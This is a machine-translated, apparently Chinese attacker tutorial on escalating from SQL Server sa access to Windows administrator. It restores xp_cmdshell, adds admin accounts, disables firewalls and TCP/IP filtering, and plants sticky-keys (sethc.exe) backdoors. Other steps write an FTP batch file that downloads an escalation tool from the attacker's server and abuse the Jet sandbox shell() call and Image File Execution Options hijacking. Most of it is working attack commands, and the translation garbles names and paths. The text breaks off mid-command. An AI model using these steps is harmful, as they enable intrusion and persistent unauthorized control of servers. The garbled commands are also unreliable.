1433 detailed process of password elevation

The following are several errors in executing commands in sa:
1. Unable to load DLL xpsql70.dll or a DLL referenced by the DLL. Cause 126 (the specified module cannot be found .)
This situation is common. It is simple to fix but conditional. In this case, if the directory can be listed (with sqltools v2.0, the column directory function is available), congratulations, 80% of this situation can be fixed. If the directory can be listed, you only need to find the path of xplog70.dll and execute the following command.
Step 1
Exec sp_dropextendedproc xp_cmdshell (this command is used to delete the original cmdshell because an error has occurred)
Step 2
Dbcc addextendedproc ("xp_mongoshell", "c: Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll ")
; EXEC sp_configure show advanced options, 0-
Of course, this is an SQL command, which is executed using the query analyzer. In step 2, c: Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll is the path of xplog70.dll, which is common. If the drive c does not have any drive letters, you can find other drive letters.
2. The xp_cmdshell function cannot be found in web70.dll. Cause: 127 (the specified program cannot be found .)
In fact, this is the same as the above 126, that is, if the mongoshell fails, you only need to find the backup xplog70.dll and follow the above method to fix it.
3. failed to find the Stored Procedure master .. xpcmdshell
In this case, I can see that the method on the internet is:
Step 1 Delete:
Drop procedure sp_addextendedproc
Drop procedure sp_oacreate
Exec sp_dropextendedproc xp_cmdshell
Step 2 recovery:
Dbcc addextendedproc ("sp_oacreate", "odsole70.dll ")
Dbcc addextendedproc ("xp_mongoshell", "xplog70.dll ")
In fact, this is the same as above. In fact, if you are careful, the above 126 127 will fail to find the storage process master when only the first step is executed .. xpcmdshell because the first step is to delete the stored procedure of mongoshell. In this case, you only need to perform the second step above.
4. Error Message: the SQL Server blocks access to the sys. xp_mongoshell PROCESS OF THE xp_mongoshell component because the component has been disabled as part of the Server's security configuration. The system administrator can use sp_configure to enable xp_cmdshell. For more information about enabling xp_cmdshell, see "peripheral application configurator" in SQL Server books online ".
This is the simplest case, because you don't have to worry about anything. simply execute the following command:
; EXEC sp_configure show advanced options, 1 --
; Reconfigure with override --
; EXEC sp_configure xp_cmdshell, 1 --
; Reconfigure with override --
; EXEC sp_configure show advanced options, 0-

After the above fix, you can execute the cmd command, and the next step is to raise the right. I usually check the ip address in ipconfig to see if it is an intranet address. Then, check whether REG query HKLMSYSTEMCurrentControlSetControlTerminal "" ServerWinStationsRDP-Tcp/v PortNumber to check the terminal port, run netstat-an to check whether the terminal is enabled, and then add the net user password/add a user, and then add the net localgroup administrators user/add the user. In this case, take the next server. However, there are still many problems in this process.
1. net permission escalation is successful but cannot connect to the terminal. The following situations exist:
(1) servers are on the Intranet.
(2) TCP/IP filtering.
Run the following cmd command:
Cmd/c regedit-e c: 1.reg HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpip, export the first entry about TCP/IP filtering in the Registry
Cmd/c regedit-e c: 2.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip, export the second entry about TCP/IP filtering in the Registry
Cmd/c regedit-e c: 3.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip ", export the third part about TCP/IP filtering in the Registry
Then, return to disk C: 1.reg, 2.reg, 3.reg, and put 1.reg, 2.reg, 3. reg is downloaded to your hard disk and edited. Find the EnableSecurityFilters field to check whether the key value behind dword is 00000000. If it is 00000001, the Administrator has performed TCP/IP filtering, we only need to change 1 to 0. reg and 3. reg.
(3) implemented an ip Security Policy.
Run the cmd command: cmd/c net stop yyagent to stop the IPSEC Services Service. Connect to the terminal again.
(4) The terminal login permission set by the Administrator is only available to the specified user.
(5) firewall. Run the cmd command: net stop alg/ynet stop sharedaccess.

2. Access denied due to net Privilege Escalation
Try net1 user Password/add. If net1 is rejected, copy a shfit backdoor and run the cmd command: copy c: windowsexplorer.exe c: windowssystem32sethc.exe.
Copy c: windowssystem32sethc.exe c: windowssystem32dllcachesethc.exe
If you are prompted to copy the 1 file, it indicates that the copy is successful. Connect to the terminal and press shift under 5 to see what is coming out. Now, you only need to manually add a user to the resource manager.
3. Access denied due to net Elevation of Privilege 5 (important)
In this case, you do not need to try net1. You can try the copy shift backdoor. If the system prompts copying 0 files after the copy operation, it proves that the file is not successful. You can try to upload a file. If you can upload a file directly, you can upload a file without the net permission escalation tool that was released some time ago, and then add a user. However, most of these cases cannot be uploaded, so consider it. Since cmd can be executed, the file can be downloaded through ftp under cmd, but the ftp must be written into text or batch processing. You can use SQL statements to write a text or batch.
Declare @ o int, @ f int, @ t int, @ ret int
Exec sp_oacreate scripting. filesystemobject, @ o out
Exec sp_oamethod @ o, createtextfile, @ f out, C: 1.bat, 1
Exec @ ret = sp_oamethod @ f, writeline, NULL, open IP
Exec @ ret = sp_oamethod @ f, writeline, NULL, ftp account
Exec @ ret = sp_oamethod @ f, writeline, NULL, ftp Password
Exec @ ret = sp_oamethod @ f, writeline, NULL, get en.exe (no net Privilege Escalation script) c: en.exe
Exec @ ret = sp_oamethod @ f, writeline, NULL, bye
After the query analyzer is successfully executed, a 1.batcommand will appear on drive c. (If the execution is successful but drive c does not, you can change the folder to write data because the root directory of the server c cannot be written)
Then run the cmd command to execute ftp-s: c: 1.bat.
After this execution is complete, a non-net elevation script or a vbs elevation script will be downloaded from the ftp drive C.
Declare @ o int, @ f int, @ t int, @ ret int
Exec sp_oacreate scripting. filesystemobject, @ o out
Exec sp_oamethod @ o, createtextfile, @ f out, c: 1.vbs, 1
Exec @ ret = sp_oamethod @ f, writeline, NULL, Set o = CreateObject ("Shell. Users ")
Exec @ ret = sp_oamethod @ f, writeline, NULL, Set z = o. create ("user ")
Exec @ ret = sp_oamethod @ f, writeline, NULL, z. changePassword "password ",""
Exec @ ret = sp_oamethod @ f, writeline, NULL, z. setting ("AccountType") = 3
Then run cmd to execute cscript c: 1.vbs.
4. As mentioned above, the command cmd can be executed successfully. However, after some fixes, new problems may occur.
(1) Message: An error occurred while executing xp_cmdshell. Failed to call CreateProcess. Error code: 5.
The error 5th is the error number of the system prompt. createprocessthis is the idea of creating a thread. This error message has a lot to do with the System File cmd.exe. One is that the cmd is deleted, and the other is that the cmd permission is reduced.
SQL to view the terminal port and opening status:
Exec master .. xp_regread HKEY_LOCAL_MACHINE, SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp, PortNumber
Well, the following key points are: we need to use two SQL commands to copy the system explorer File as the system shift backdoor file. The following two statements are executed separately.
Copy assumer.exeto sethc.exe.
Declare @ o int exec sp_oacreate scripting. filesystemobject, @ o out exec sp_oamethod @ o, copyfile, null, c: windowsexplorer.exe, c: windowssystem32sethc.exe;
Copy sethc.exe to the dllcache directory.
Declare @ oo int exec sp_oacreate scripting. filesystemobject, @ oo out exec sp_oamethod @ oo, copyfile, null, c: windowssystem32sethc.exe, c: windowssystem32dllcachesethc.exe;
In addition, the sp_oacreate stored procedure used by these two statements must use the odsole70.dll file. Therefore, the survival of this file is related to the creation success or failure.
(2) xpsql. cpp: Error 5 comes from CreateProcess (row 737th)
This situation is tricky.
EXEC master. dbo. xp_regwrite HKEY_LOCAL_MACHINE, SoftWareMicrosoftJet4.0Engines, SandBoxMode, REG_DWORD, 0
Select * From OpenRowSet (Microsoft. Jet. OLEDB.4.0,; Database = c: windowssystem32iasias. mdb, select shell ("net user 123 123/add "));
Select * From OpenRowSet (Microsoft. Jet. OLEDB.4.0,; Database = c: windowssystem32iasias. mdb, select shell ("net localgroup administrators 123/add "));
In this way, the user is directly added. I checked the sandbox elevation permission used to check this matter, but through my practice, this success rate is very low, because most servers use c: windowssystem32iasias. mdb deleted. You can try image hijacking sethc. Of course, image hijacking is also conditional. 1 requires xp_regwrite. 2 is HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe. The key value of Debugger is not deleted.
You can run the SQL command to check whether the secret key of the Registry is hijacked.
Exec master.. xp_regread HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe, Debugger
If the question is not found, it indicates that it has been deleted, and the method has not been completed, if you prompt sethc.exe to execute the SQL command
EXEC master .. xp_regwrite
@ Rootkey = HKEY_LOCAL_MACHINE,
@ Key = SOFTWAREMicrosoftWindows NTCurrentVersionIma